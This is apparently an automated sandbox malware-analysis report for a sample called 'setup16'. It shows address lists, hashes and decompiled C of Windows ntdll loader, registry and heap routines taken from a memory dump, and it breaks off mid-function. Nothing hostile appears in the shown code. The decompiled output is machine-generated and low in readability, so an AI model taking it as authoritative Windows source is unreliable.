                                                                                                                                                                                                        0x04a29ca9
                                                                                                                                                                                                        0x04a29ca3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29c97
                                                                                                                                                                                                        0x049d897d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8974
                                                                                                                                                                                                        0x049d8988
                                                                                                                                                                                                        0x049d8992
                                                                                                                                                                                                        0x049d8996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8996
                                                                                                                                                                                                        0x049d894c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d8870
                                                                                                                                                                                                        0x049d887b
                                                                                                                                                                                                        0x049d887d
                                                                                                                                                                                                        0x049d887f
                                                                                                                                                                                                        0x049d8881
                                                                                                                                                                                                        0x049d8884
                                                                                                                                                                                                        0x049d8884
                                                                                                                                                                                                        0x049d8886
                                                                                                                                                                                                        0x049d8889
                                                                                                                                                                                                        0x049d888c
                                                                                                                                                                                                        0x049d888e
                                                                                                                                                                                                        0x049d8891
                                                                                                                                                                                                        0x049d8891
                                                                                                                                                                                                        0x049d8898
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d889a
                                                                                                                                                                                                        0x049d889b
                                                                                                                                                                                                        0x049d889e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88a0
                                                                                                                                                                                                        0x049d88a8
                                                                                                                                                                                                        0x049d88b0
                                                                                                                                                                                                        0x049d88b2
                                                                                                                                                                                                        0x049d88d3
                                                                                                                                                                                                        0x049d88d5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88d7
                                                                                                                                                                                                        0x049d88db
                                                                                                                                                                                                        0x049d88dc
                                                                                                                                                                                                        0x049d88e0
                                                                                                                                                                                                        0x049d88e8
                                                                                                                                                                                                        0x049d88ee
                                                                                                                                                                                                        0x049d88f0
                                                                                                                                                                                                        0x049d88f3
                                                                                                                                                                                                        0x049d88fc
                                                                                                                                                                                                        0x049d8901
                                                                                                                                                                                                        0x049d8906
                                                                                                                                                                                                        0x049d890c
                                                                                                                                                                                                        0x049d890c
                                                                                                                                                                                                        0x049d890f
                                                                                                                                                                                                        0x049d8916
                                                                                                                                                                                                        0x049d8917
                                                                                                                                                                                                        0x049d8918
                                                                                                                                                                                                        0x049d8919
                                                                                                                                                                                                        0x049d891a
                                                                                                                                                                                                        0x049d891f
                                                                                                                                                                                                        0x049d8921
                                                                                                                                                                                                        0x04a29c52
                                                                                                                                                                                                        0x04a29c55
                                                                                                                                                                                                        0x04a29c5b
                                                                                                                                                                                                        0x04a29cac
                                                                                                                                                                                                        0x04a29cc0
                                                                                                                                                                                                        0x04a29cc0
                                                                                                                                                                                                        0x04a29c55
                                                                                                                                                                                                        0x049d8927
                                                                                                                                                                                                        0x049d8927
                                                                                                                                                                                                        0x049d892f
                                                                                                                                                                                                        0x049d8933
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88f5
                                                                                                                                                                                                        0x049d88f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88f7
                                                                                                                                                                                                        0x049d88f7
                                                                                                                                                                                                        0x049d88fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88fa
                                                                                                                                                                                                        0x049d88f5
                                                                                                                                                                                                        0x049d88f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88d5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88b2
                                                                                                                                                                                                        0x049d88c9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d88c9
                                                                                                                                                                                                        0x049d887f
                                                                                                                                                                                                        0x049d886a
                                                                                                                                                                                                        0x049d8857
                                                                                                                                                                                                        0x049d8852
                                                                                                                                                                                                        0x049d88bf
                                                                                                                                                                                                        0x049d88bf
                                                                                                                                                                                                        0x049d87aa
                                                                                                                                                                                                        0x049d87ad
                                                                                                                                                                                                        0x049d87ae
                                                                                                                                                                                                        0x049d87b4
                                                                                                                                                                                                        0x049d87b5
                                                                                                                                                                                                        0x049d87b6
                                                                                                                                                                                                        0x049d87b8
                                                                                                                                                                                                        0x049d87bd
                                                                                                                                                                                                        0x049d87c1
                                                                                                                                                                                                        0x049d87f4
                                                                                                                                                                                                        0x049d87fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d87c1
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 04A29C28
                                                                                                                                                                                                        • LdrpDoPostSnapWork, xrefs: 04A29C1E
                                                                                                                                                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04A29C18
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                        • API String ID: 2994545307-1948996284
                                                                                                                                                                                                        • Opcode ID: 9c3c3b8c04d000838664ce5f107509e2710337a2237547bb7d9a5ca025135d4d
                                                                                                                                                                                                        • Instruction ID: 1cad4f291dbf59ba4d1db6ccf926857f9514886fbd488c28a0a1a06d21532a50
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c3c3b8c04d000838664ce5f107509e2710337a2237547bb7d9a5ca025135d4d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A91E3B1B00216AFDF18EF59C481ABA73BDFF84354B448479E965AB252E730BD01CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 98%
                                                                                                                                                                                                        			E049D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E049DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E049CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4ab5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04A45510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4ab5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E049E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E049E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04A47016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E049E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E049E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04A47016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E049FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E049CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                                                                                                        0x049d7e4c
                                                                                                                                                                                                        0x049d7e50
                                                                                                                                                                                                        0x049d7e55
                                                                                                                                                                                                        0x049d7e58
                                                                                                                                                                                                        0x049d7e5d
                                                                                                                                                                                                        0x049d7e71
                                                                                                                                                                                                        0x049d7f33
                                                                                                                                                                                                        0x049d7e77
                                                                                                                                                                                                        0x049d7e77
                                                                                                                                                                                                        0x049d7e79
                                                                                                                                                                                                        0x049d7e79
                                                                                                                                                                                                        0x049d7e7e
                                                                                                                                                                                                        0x049d7f45
                                                                                                                                                                                                        0x04a29848
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29848
                                                                                                                                                                                                        0x049d7f4e
                                                                                                                                                                                                        0x049d7f53
                                                                                                                                                                                                        0x049d7f5a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2985a
                                                                                                                                                                                                        0x04a29862
                                                                                                                                                                                                        0x04a29866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2986c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2986c
                                                                                                                                                                                                        0x049d7e84
                                                                                                                                                                                                        0x049d7e84
                                                                                                                                                                                                        0x049d7e8d
                                                                                                                                                                                                        0x04a29871
                                                                                                                                                                                                        0x049d7eb8
                                                                                                                                                                                                        0x049d7ec0
                                                                                                                                                                                                        0x049d7ec0
                                                                                                                                                                                                        0x049d7e9a
                                                                                                                                                                                                        0x04a2987e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29884
                                                                                                                                                                                                        0x04a2988b
                                                                                                                                                                                                        0x04a298a7
                                                                                                                                                                                                        0x04a298ac
                                                                                                                                                                                                        0x04a298b1
                                                                                                                                                                                                        0x04a298b6
                                                                                                                                                                                                        0x04a298b8
                                                                                                                                                                                                        0x04a298b8
                                                                                                                                                                                                        0x04a298b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a298b9
                                                                                                                                                                                                        0x049d7ea0
                                                                                                                                                                                                        0x049d7ea7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d7eac
                                                                                                                                                                                                        0x049d7eb1
                                                                                                                                                                                                        0x049d7ec6
                                                                                                                                                                                                        0x049d7ed0
                                                                                                                                                                                                        0x04a298cc
                                                                                                                                                                                                        0x049d7ed6
                                                                                                                                                                                                        0x049d7ed6
                                                                                                                                                                                                        0x049d7ed6
                                                                                                                                                                                                        0x049d7ede
                                                                                                                                                                                                        0x049d7ee3
                                                                                                                                                                                                        0x04a298e3
                                                                                                                                                                                                        0x04a298f0
                                                                                                                                                                                                        0x04a29902
                                                                                                                                                                                                        0x04a298f2
                                                                                                                                                                                                        0x04a298fb
                                                                                                                                                                                                        0x04a298fb
                                                                                                                                                                                                        0x04a29907
                                                                                                                                                                                                        0x04a2991d
                                                                                                                                                                                                        0x04a2991d
                                                                                                                                                                                                        0x04a29907
                                                                                                                                                                                                        0x04a298e3
                                                                                                                                                                                                        0x049d7ef0
                                                                                                                                                                                                        0x049d7f14
                                                                                                                                                                                                        0x049d7f14
                                                                                                                                                                                                        0x049d7f1e
                                                                                                                                                                                                        0x04a29946
                                                                                                                                                                                                        0x049d7f24
                                                                                                                                                                                                        0x049d7f24
                                                                                                                                                                                                        0x049d7f24
                                                                                                                                                                                                        0x049d7f2c
                                                                                                                                                                                                        0x04a2996a
                                                                                                                                                                                                        0x04a29975
                                                                                                                                                                                                        0x04a29975
                                                                                                                                                                                                        0x04a2997e
                                                                                                                                                                                                        0x04a29993
                                                                                                                                                                                                        0x04a29993
                                                                                                                                                                                                        0x04a2997e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d7ef2
                                                                                                                                                                                                        0x049d7efc
                                                                                                                                                                                                        0x049d7f0a
                                                                                                                                                                                                        0x049d7f0e
                                                                                                                                                                                                        0x04a29933
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a29933
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d7f0e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d7eb1

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • LdrpCompleteMapModule, xrefs: 04A29898
                                                                                                                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 04A298A2
                                                                                                                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 04A29891
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                        • API String ID: 0-1676968949
                                                                                                                                                                                                        • Opcode ID: 1e14d069f17b2b12a0965c7bc08c281324d159b35f5974327c4bf6a115b66bb2
                                                                                                                                                                                                        • Instruction ID: 0dd03d3c2d7145a636248dc73f186c79190bb2c45c01c48aba2f946e06f62143
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e14d069f17b2b12a0965c7bc08c281324d159b35f5974327c4bf6a115b66bb2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B451E271B007549BEB25CBACC948B2AB7E9AB40714F0445B9E8519B7E1D734FD00DBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E049CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E049CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04A095D0();
						}
						if(_t78 != 0) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04A0FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04A0BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04A09600();
					if(_t97 < 0) {
						goto L6;
					}
					E04A0BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L049CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04A0BB40(_t83, _t102 + 0x24, _t78);
								if(L049D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04A0BB40(_t84, _t102 + 0x24, _t94);
									if(L049D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                                                                                                        0x049ce620
                                                                                                                                                                                                        0x049ce628
                                                                                                                                                                                                        0x049ce62f
                                                                                                                                                                                                        0x049ce631
                                                                                                                                                                                                        0x049ce635
                                                                                                                                                                                                        0x049ce637
                                                                                                                                                                                                        0x049ce63e
                                                                                                                                                                                                        0x04a25503
                                                                                                                                                                                                        0x04a25503
                                                                                                                                                                                                        0x049ce64c
                                                                                                                                                                                                        0x049ce64c
                                                                                                                                                                                                        0x049ce651
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ce661
                                                                                                                                                                                                        0x049ce665
                                                                                                                                                                                                        0x04a2542a
                                                                                                                                                                                                        0x049ce715
                                                                                                                                                                                                        0x049ce71a
                                                                                                                                                                                                        0x049ce71c
                                                                                                                                                                                                        0x049ce720
                                                                                                                                                                                                        0x049ce720
                                                                                                                                                                                                        0x049ce727
                                                                                                                                                                                                        0x049ce736
                                                                                                                                                                                                        0x049ce736
                                                                                                                                                                                                        0x049ce743
                                                                                                                                                                                                        0x049ce743
                                                                                                                                                                                                        0x049ce673
                                                                                                                                                                                                        0x049ce678
                                                                                                                                                                                                        0x049ce67d
                                                                                                                                                                                                        0x049ce682
                                                                                                                                                                                                        0x049ce685
                                                                                                                                                                                                        0x049ce692
                                                                                                                                                                                                        0x049ce69b
                                                                                                                                                                                                        0x049ce6a3
                                                                                                                                                                                                        0x049ce6ad
                                                                                                                                                                                                        0x049ce6b1
                                                                                                                                                                                                        0x049ce6b2
                                                                                                                                                                                                        0x049ce6bb
                                                                                                                                                                                                        0x049ce6bf
                                                                                                                                                                                                        0x049ce6c0
                                                                                                                                                                                                        0x049ce6c8
                                                                                                                                                                                                        0x049ce6cc
                                                                                                                                                                                                        0x049ce6d5
                                                                                                                                                                                                        0x049ce6d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ce6e5
                                                                                                                                                                                                        0x049ce6ea
                                                                                                                                                                                                        0x049ce6f9
                                                                                                                                                                                                        0x049ce70b
                                                                                                                                                                                                        0x049ce70f
                                                                                                                                                                                                        0x04a25439
                                                                                                                                                                                                        0x04a2545e
                                                                                                                                                                                                        0x04a2545e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2545e
                                                                                                                                                                                                        0x04a2543b
                                                                                                                                                                                                        0x04a2543e
                                                                                                                                                                                                        0x04a25440
                                                                                                                                                                                                        0x04a25445
                                                                                                                                                                                                        0x04a25472
                                                                                                                                                                                                        0x04a25475
                                                                                                                                                                                                        0x04a2548d
                                                                                                                                                                                                        0x04a25493
                                                                                                                                                                                                        0x04a254a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a254ab
                                                                                                                                                                                                        0x04a254b4
                                                                                                                                                                                                        0x04a254bc
                                                                                                                                                                                                        0x04a254c8
                                                                                                                                                                                                        0x04a254de
                                                                                                                                                                                                        0x04a254fb
                                                                                                                                                                                                        0x04a254e0
                                                                                                                                                                                                        0x04a254e6
                                                                                                                                                                                                        0x04a254eb
                                                                                                                                                                                                        0x04a254eb
                                                                                                                                                                                                        0x04a254de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a254bc
                                                                                                                                                                                                        0x04a25477
                                                                                                                                                                                                        0x04a2547a
                                                                                                                                                                                                        0x04a25480
                                                                                                                                                                                                        0x04a25483
                                                                                                                                                                                                        0x04a25486
                                                                                                                                                                                                        0x04a2548b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2548b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a25447
                                                                                                                                                                                                        0x04a25447
                                                                                                                                                                                                        0x04a25447
                                                                                                                                                                                                        0x04a25447
                                                                                                                                                                                                        0x04a2544e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a25450
                                                                                                                                                                                                        0x04a25452
                                                                                                                                                                                                        0x04a25455
                                                                                                                                                                                                        0x04a2545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2545c
                                                                                                                                                                                                        0x04a2546a
                                                                                                                                                                                                        0x04a2546d
                                                                                                                                                                                                        0x04a2546f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a2546f
                                                                                                                                                                                                        0x049ce70f

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • @, xrefs: 049CE6C0
                                                                                                                                                                                                        • InstallLanguageFallback, xrefs: 049CE6DB
                                                                                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 049CE68C
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                                                                        • API String ID: 0-1757540487
                                                                                                                                                                                                        • Opcode ID: aff9d373ba1c5ba04a00c74b006c7c91e013128660625856bd5080ac2447b6ab
                                                                                                                                                                                                        • Instruction ID: ae86f51d4a7f03bfbcf4d5ff156bfc5226d989288485dae234fb60c448ac4bc2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aff9d373ba1c5ba04a00c74b006c7c91e013128660625856bd5080ac2447b6ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66519171908365ABD714DF68C540A6BB3E9BF98714F05492EF985D7240F734FA04C7A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A8E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E04A8E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E04A8BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E04A8BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E04A8AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04A09730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E04A8A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E04A8A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04A09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E04A8A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E04A8A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
